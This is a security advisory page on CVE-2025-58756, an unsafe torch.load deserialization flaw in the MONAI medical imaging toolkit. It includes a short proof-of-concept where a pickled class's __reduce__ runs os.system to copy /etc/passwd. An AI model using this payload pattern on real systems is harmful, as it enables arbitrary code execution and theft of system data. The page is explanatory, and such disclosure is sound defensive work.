Overview
CVE-2025-58756 is a critical vulnerability discovered in the MONAI (Medical Open Network for AI) toolkit, a popular AI solution for healthcare imaging. This vulnerability, stemming from an insecure loading method, can potentially lead to an attacker executing malicious code, compromising the system and potentially leading to data leaks. This vulnerability is particularly worrisome due to MONAI’s widespread usage in the healthcare sector, making it a prime target for cybercriminals seeking sensitive medical data.
Vulnerability Summary
CVE ID: CVE-2025-58756
Severity: Critical – CVSS 8.8
Attack Vector: Remote
Privileges Required: None
User Interaction: None
Impact: Potential system compromise and data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
MONAI | Up to and including 1.5.0
How the Exploit Works
The vulnerability lies in the way MONAI loads checkpoints. While the `model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)` in monai/bundle/scripts.py is loaded securely, there are other instances in the project where checkpoints are loaded insecurely. This insecure method could be exploited when users attempt to reduce training time and costs by loading pre-trained models downloaded from other platforms. If a malicious actor can manipulate these pre-trained models or checkpoints, they can introduce malicious content that, when loaded, triggers a deserialization vulnerability, leading to arbitrary code execution.
Conceptual Example Code
A conceptual example of how this vulnerability might be exploited is an attacker crafting a malicious pre-trained model or checkpoint. When this model is loaded by the victim, the malicious code gets executed. Below is a simplified example:
# Attacker crafts a model with malicious code
class MaliciousModel:
def __reduce__(self):
return (os.system, ('cat /etc/passwd > /tmp/passwd_copy',))
checkpoint = {
'model': MaliciousModel(),
# other legit data
}
# Victim loads the model
torch.load('malicious_checkpoint.pth')
In this example, the malicious model, when deserialized, executes the `os.system` function with the argument `’cat /etc/passwd > /tmp/passwd_copy’`, copying the content of `/etc/passwd` to a temporary file.
Please note that this is a simplified example and the actual exploitation may involve more complex steps and obfuscation techniques.